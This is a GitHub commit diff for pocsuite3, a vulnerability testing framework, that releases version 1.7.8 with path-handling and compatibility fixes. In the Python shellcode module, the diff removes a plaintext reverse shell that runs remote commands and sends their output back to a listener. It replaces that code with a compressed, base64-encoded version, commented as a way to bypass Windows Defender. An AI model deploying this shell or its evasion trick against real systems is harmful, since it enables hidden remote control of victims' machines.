Skip to content

Commit

Permalink
Merge pull request #206 from 13ph03nix/master
Browse files Browse the repository at this point in the history
New feature and fix compatibility problem
  • Loading branch information
13ph03nix authored Aug 17, 2021
2 parents 1686ece + 0d8e05f commit eaa996a
Show file tree
Hide file tree
Showing 9 changed files with 51 additions and 53 deletions.
9 changes: 8 additions & 1 deletion CHANGELOG.md
Original file line number Diff line number Diff line change
Expand Up @@ -231,4 +231,11 @@ Cross-platform shell code generation
# version 1.7.7
-----------------
* 添加--dork自动用poc中的dork字段扫描功能
* 适配Debian源格式需求
* 适配Debian源格式需求

# version 1.7.8
-----------------
* add option to display extra parameters of poc
* add more poc attribute to result dict
* allow custom module path in console mode
* fix some compatibility problems
2 changes: 1 addition & 1 deletion docs/CODING.md
Original file line number Diff line number Diff line change
Expand Up @@ -646,7 +646,7 @@ from pocsuite3.api import get_results
def run_pocsuite():
# config 配置可参见命令行参数, 用于初始化 pocsuite3.lib.core.data.conf
config = {
'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21']
'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21'],
'poc': ['ecshop_rce', 'ftp_burst']
}

Expand Down
2 changes: 1 addition & 1 deletion manpages/poc-console.1
Original file line number Diff line number Diff line change
Expand Up @@ -31,7 +31,7 @@ is maintained at:
.I https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md
.PP
.SH VERSION
This manual page documents pocsuite version 1.7.7
This manual page documents pocsuite version 1.7.8
.SH AUTHOR
.br
(c) 2014-2021 by Knownsec 404 Team
Expand Down
2 changes: 1 addition & 1 deletion manpages/pocsuite.1
Original file line number Diff line number Diff line change
Expand Up @@ -250,7 +250,7 @@ is maintained at:
.I https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md
.PP
.SH VERSION
This manual page documents pocsuite version 1.7.7
This manual page documents pocsuite version 1.7.8
.SH AUTHOR
.br
(c) 2014-2021 by Knownsec 404 Team
Expand Down
2 changes: 1 addition & 1 deletion pocsuite3/__init__.py
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
__title__ = 'pocsuite'
__version__ = '1.7.7'
__version__ = '1.7.8'
__author__ = 'Knownsec Security Team'
__author_email__ = '[email protected]'
__license__ = 'GPL 2.0'
Expand Down
9 changes: 4 additions & 5 deletions pocsuite3/lib/core/common.py
Original file line number Diff line number Diff line change
Expand Up @@ -797,16 +797,15 @@ def ltrim(text, char):
return text


def index_modules() -> list:
def index_modules(modules_directory):
""" Returns list of all exploits modules
:param str modules_directory: path to modules directory
:return list: list of found modules
"""

modules = []
for root, dirs, files in os.walk(paths.POCSUITE_POCS_PATH):
_, package, root = root.rpartition("pocsuite3/pocs/".replace("/", os.sep))
for root, _, files in os.walk(modules_directory):
files = filter(lambda x: not x.startswith("__") and x.endswith(".py"), files)
modules.extend(map(lambda x: os.sep.join((root, os.path.splitext(x)[0])), files))

Expand All @@ -822,7 +821,7 @@ def humanize_path(path: str) -> str:
:return str: humanized path
"""

return path.replace(".", "/")
return path.replace(".", os.sep)


def pythonize_path(path: str) -> str:
Expand All @@ -834,7 +833,7 @@ def pythonize_path(path: str) -> str:
:return str: pythonized path
"""

return path.replace("/", ".")
return path.replace(os.sep, ".")


def module_required(fn):
Expand Down
20 changes: 10 additions & 10 deletions pocsuite3/lib/core/interpreter.py
Original file line number Diff line number Diff line change
Expand Up @@ -171,7 +171,7 @@ class PocsuiteInterpreter(BaseInterpreter):
attack Attack target and return target vulnerable infomation
exploit Get a shell from remote target"""

def __init__(self):
def __init__(self, module_directory=paths.POCSUITE_POCS_PATH):
super(PocsuiteInterpreter, self).__init__()

self.current_module = None
Expand All @@ -186,7 +186,9 @@ def __init__(self):
self.module_commands.extend(self.global_commands)
self.module_commands.sort()

self.modules = index_modules()
self.modules = index_modules(module_directory)
self.module_parent_directory = os.sep.join(
module_directory.rstrip(os.sep).split(os.sep)[0:-1]) + os.sep
self.modules_count = len(self.modules)
# init
conf.console_mode = True
Expand All @@ -198,10 +200,8 @@ def __init__(self):
self.main_modules_dirs = []
for module in self.modules:
temp_module = module
if IS_WIN:
temp_module = temp_module.replace("/", "\\")
temp_module = temp_module.replace(paths.POCSUITE_ROOT_PATH, "").lstrip("\\")
temp_module = temp_module.replace(paths.POCSUITE_ROOT_PATH, "").lstrip("/")
temp_module = temp_module.replace(
self.module_parent_directory, '').lstrip(os.sep)
self.main_modules_dirs.append(temp_module)

self.__parse_prompt()
Expand Down Expand Up @@ -315,16 +315,16 @@ def command_use(self, module_path, *args, **kwargs):
if not module_path.endswith(".py"):
module_path = module_path + ".py"
if not os.path.exists(module_path):
module_path = os.path.join(paths.POCSUITE_ROOT_PATH, module_path)
module_path = os.path.join(self.module_parent_directory, module_path)
if not os.path.exists(module_path):
errMsg = "No such file: '{0}'".format(module_path)
logger.error(errMsg)
return
try:
load_file_to_module(module_path)
self.current_module = kb.current_poc
self.current_module.pocsuite3_module_path = ltrim(rtrim(module_path, ".py"),
os.path.join(paths.POCSUITE_ROOT_PATH, ""))
self.current_module.pocsuite3_module_path = ltrim(
rtrim(module_path, ".py"), self.module_parent_directory)
except Exception as err:
logger.error(str(err))

Expand Down Expand Up @@ -447,7 +447,7 @@ def command_list(self, *args, **kwargs):
tb = prettytable.PrettyTable(["Index", "Path", "Name"])
index = 0
for tmp_module in self.main_modules_dirs:
found = os.path.join(paths.POCSUITE_ROOT_PATH, tmp_module + ".py")
found = os.path.join(self.module_parent_directory, tmp_module + ".py")
with open(found, encoding='utf-8') as f:
code = f.read()
name = get_poc_name(code)
Expand Down
50 changes: 21 additions & 29 deletions pocsuite3/shellcodes/python.py
Original file line number Diff line number Diff line change
@@ -1,3 +1,5 @@
import zlib
import base64
from .base import ShellCode


Expand All @@ -7,7 +9,8 @@ class PythonShellCode(ShellCode):
"""

def __init__(self, connect_back_ip='localhost', connect_back_port=5555):
ShellCode.__init__(self, connect_back_ip=connect_back_ip, connect_back_port=connect_back_port)
ShellCode.__init__(self, connect_back_ip=connect_back_ip,
connect_back_port=connect_back_port)

def get_python_code(self, bad_chars):
"""
Expand All @@ -18,34 +21,23 @@ def get_python_code(self, bad_chars):
print("Settings for connect back listener must be defined")
return False

python_code = """
#!/usr/bin/python
import socket,subprocess
HOST = '{{LOCALHOST}}' # The remote host
PORT = {{LOCALPORT}} # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
s.connect((HOST, PORT))
# send we are connected
s.send('[*] Connection Established!')
# start loop
while 1:
# recieve shell command
data = s.recv(1024)
print data
# if its quit, then break out and close socket
if data == 'quit' or data == 'q':
break
# do shell command
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
# close socket
s.close()
"""

# compress and base64 encode to bypass windows defender
python_code = (
b'eJxtUsFu2zAMvfsrWORgezOctdhpQA5BkGHFuiZofBuGQLY4'
b'WKgteZKcoijy7yUlNzOK6mLz8fHpkeLiajk6u6yVXg7PvjU6'
b'Uf1grAdnmkf0hRvrwZoGnUt+7A4VrCB9ebnbbdZ3HJ7PKdBZ'
b'QNUiWOyNR2iN88l+98DcicrR+Qzwn+tEjxDuEQ5GhxLqZ/Cc'
b'QHtCmzgqjg7K+MmmaP39eHu/rYq37GG3+Xk8VA/b9a88WUBj'
b'tMbGgzcgvBdEsdCLplUaE1dO2Sxj7wWwrZyrHGoJTwjC4psC'
b'SuIznqW/P/2BTUSV0bB1XtSdci3KqzRUe0F9dMYMyVOrOoTr'
b'b0ns1GKj8ERNtdh1pNz3QsuQk8ILbrEkyim7/nLzNQ/4YJX2'
b'ITtJqL+gvIN/o/IFD0hDbVE8ghlpdOS66YzDaRihhAqiOL0U'
b'V6Vg7AxJozc+QWi6RpoPTPLDs8nLCpR7M6DOWK2I/FVlR6R/'
b'L8nQas683W8DjtZ+iCv9Hs4vUxOS+xvG2FEUP55ENyLZ4ZIy'
b'YiVTsxw+X0C6bQInsfC0UWy+FFE4PvBcP+zQfKS0NByS3itr'
b'QQTj'
)
python_code = zlib.decompress(base64.b64decode(python_code)).decode()
python_code = self.format_shellcode(python_code)
return python_code

Expand Down
8 changes: 4 additions & 4 deletions setup.py
Original file line number Diff line number Diff line change
Expand Up @@ -7,14 +7,14 @@

def find_packages(where='.'):
# os.walk -> list[(dirname, list[subdirs], list[files])]
return [folder.replace("/", ".").lstrip(".")
for (folder, _, fils) in os.walk(where)
if "__init__.py" in fils]
return [folder.replace(os.sep, ".").strip(".")
for (folder, _, files) in os.walk(where)
if "__init__.py" in files]


setup(
name='pocsuite3',
version='1.7.7',
version='1.7.8',
url='http://pocsuite.org',
description='Pocsuite is an open-sourced remote vulnerability testing framework developed by the Knownsec Security Team.',
long_description="""\
Expand Down

0 comments on commit eaa996a

Please sign in to comment.